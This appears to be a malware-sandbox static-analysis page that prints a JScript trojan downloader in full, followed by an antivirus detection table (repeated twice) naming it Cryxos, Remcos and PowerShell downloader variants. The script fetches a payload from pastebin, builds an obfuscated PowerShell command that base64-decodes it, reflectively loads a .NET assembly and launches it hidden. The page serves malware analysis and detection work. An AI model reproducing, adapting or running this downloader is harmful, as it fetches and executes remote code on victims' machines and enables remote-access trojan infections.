Static | ZeroBOX

;;;;;;;;;;;;;;;//29/06/23

function RrFAD( yiMcp ){

var isClH = new ActiveXObject("MSXML2.ServerXMLHTTP.6.0");

isClH.open ("GET", yiMcp, false);

isClH.send ();

return isClH.responseText ;

var hnbEE

hnbEE = ( "6euTGSbt/war/moc.nibetsap//:sptth" );

var ZcuQJ

ZcuQJ = RrFAD( RrFAD ( "https://pastebin.com/raw/NVAgzFRR" ) );

var IbSpP ;

IbSpP = "$YgNut = '" + ZcuQJ ;;;;;

IbSpP = IbSpP + "';$YgNut = $YgNut.Replace('

', 'A');" ;;;;;

IbSpP = IbSpP + "[Byte[]] $dVqHc = [System.Co";

IbSpP = IbSpP + "nvert]::FromBas" + "e" + Math.round(63.9) + "Str" + "ing( $Yg" + "Nut );" ;;;;;;

IbSpP = IbSpP + "[System.App" ;;;;;;

IbSpP = IbSpP + "Domain]::Curren" ;;;;;;

IbSpP = IbSpP + "tDomain." ;;;;;;

IbSpP = IbSpP + "Load($dVqHc).Get" ;;;;;;

IbSpP = IbSpP + "Type('ClassL" ;;;;;;

IbSpP = IbSpP + "ibrar" ;;;;;;

IbSpP = IbSpP + "y3.Clas" ;;;;;;

IbSpP = IbSpP + "s1').GetM" ;;;;;;

IbSpP = IbSpP + "ethod('prF" ;;;;;;

IbSpP = IbSpP + "VI').In";

IbSpP = IbSpP + "voke($nu" ;;;;;;

IbSpP = IbSpP + "ll, [ob";

IbSpP = IbSpP + "ject[]] ('" ;;;;;;

IbSpP = IbSpP + hnbEE + "' , '" ;;;;;;

IbSpP = IbSpP + WScript.ScriptFullName ;;;;;;

IbSpP = IbSpP + "' , " ;;;;;

IbSpP = IbSpP + "'true'" ;;;;;;

IbSpP = IbSpP + " ) );" ;;;;;;

var bHefV = new ActiveXObject("Shell.Application") ;;;;;;

bHefV.ShellExecute("powershell" , " -command " + IbSpP , "" , "open" , 0) ;;;;;;

Antivirus	Signature
Bkav	Clean
Lionic	Clean
DrWeb	JS.DownLoader.6233
ClamAV	Clean
FireEye	JS:Trojan.Cryxos.12968
CAT-QuickHeal	Clean
McAfee	Clean
Malwarebytes	Clean
VIPRE	JS:Trojan.Cryxos.12968
Sangfor	Clean
K7AntiVirus	Clean
K7GW	Clean
Arcabit	JS:Trojan.Cryxos.D32A8
BitDefenderTheta	Clean
VirIT	Trojan.JS.Remcos.DSI
Cyren	Clean
Symantec	Clean
ESET-NOD32	JS/TrojanDownloader.Agent.ZYN
TrendMicro-HouseCall	Clean
Avast	Script:SNH-gen [Drp]
Cynet	Clean
Kaspersky	HEUR:Trojan.Script.Generic
BitDefender	JS:Trojan.Cryxos.12968
NANO-Antivirus	Trojan.Script.Heuristic-js.iacgm
ViRobot	Clean
MicroWorld-eScan	JS:Trojan.Cryxos.12968
Rising	Clean
Sophos	Clean
F-Secure	Clean
Baidu	Clean
Zillya	Clean
TrendMicro	Clean
McAfee-GW-Edition	Clean
CMC	Clean
Emsisoft	JS:Trojan.Cryxos.12968 (B)
Ikarus	Trojan-Downloader.PowerShell.Agent
Jiangmin	Clean
Avira	Clean
Antiy-AVL	Clean
Gridinsoft	Clean
Xcitium	Clean
Microsoft	Clean
SUPERAntiSpyware	Clean
ZoneAlarm	HEUR:Trojan.Script.Generic
GData	JS:Trojan.Cryxos.12968
Google	Detected
AhnLab-V3	Clean
Acronis	Clean
VBA32	Clean
ALYac	JS:Trojan.Cryxos.12968
MAX	malware (ai score=89)
Zoner	Clean
Tencent	Clean
Yandex	Clean
TACHYON	Clean
MaxSecure	Clean
Fortinet	JS/Agent.ZYN!tr
AVG	Script:SNH-gen [Drp]
Panda	Clean

Antivirus

Signature

Bkav

Clean

Lionic

Clean

DrWeb

JS.DownLoader.6233

ClamAV

Clean

FireEye

JS:Trojan.Cryxos.12968

CAT-QuickHeal

Clean

McAfee

Clean

Malwarebytes

Clean

VIPRE

JS:Trojan.Cryxos.12968

Sangfor

Clean

K7AntiVirus

Clean

K7GW

Clean

Arcabit

JS:Trojan.Cryxos.D32A8

BitDefenderTheta

Clean

VirIT

Trojan.JS.Remcos.DSI

Cyren

Clean

Symantec

Clean

ESET-NOD32

JS/TrojanDownloader.Agent.ZYN

TrendMicro-HouseCall

Clean

Avast

Script:SNH-gen [Drp]

Cynet

Clean

Kaspersky

HEUR:Trojan.Script.Generic

BitDefender

JS:Trojan.Cryxos.12968

NANO-Antivirus

Trojan.Script.Heuristic-js.iacgm

ViRobot

Clean

MicroWorld-eScan

JS:Trojan.Cryxos.12968

Rising

Clean

Sophos

Clean

F-Secure

Clean

Baidu

Clean

Zillya

Clean

TrendMicro

Clean

McAfee-GW-Edition

Clean

CMC

Clean

Emsisoft

JS:Trojan.Cryxos.12968 (B)

Ikarus

Trojan-Downloader.PowerShell.Agent

Jiangmin

Clean

Avira

Clean

Antiy-AVL

Clean

Gridinsoft

Clean

Xcitium

Clean

Microsoft

Clean

SUPERAntiSpyware

Clean

ZoneAlarm

HEUR:Trojan.Script.Generic

GData

JS:Trojan.Cryxos.12968

Google

Detected

AhnLab-V3

Clean

Acronis

Clean

VBA32

Clean

ALYac

JS:Trojan.Cryxos.12968

MAX

malware (ai score=89)

Zoner

Clean

Tencent

Clean

Yandex

Clean

TACHYON

Clean

MaxSecure

Clean

Fortinet

JS/Agent.ZYN!tr

AVG

Script:SNH-gen [Drp]

Panda

Clean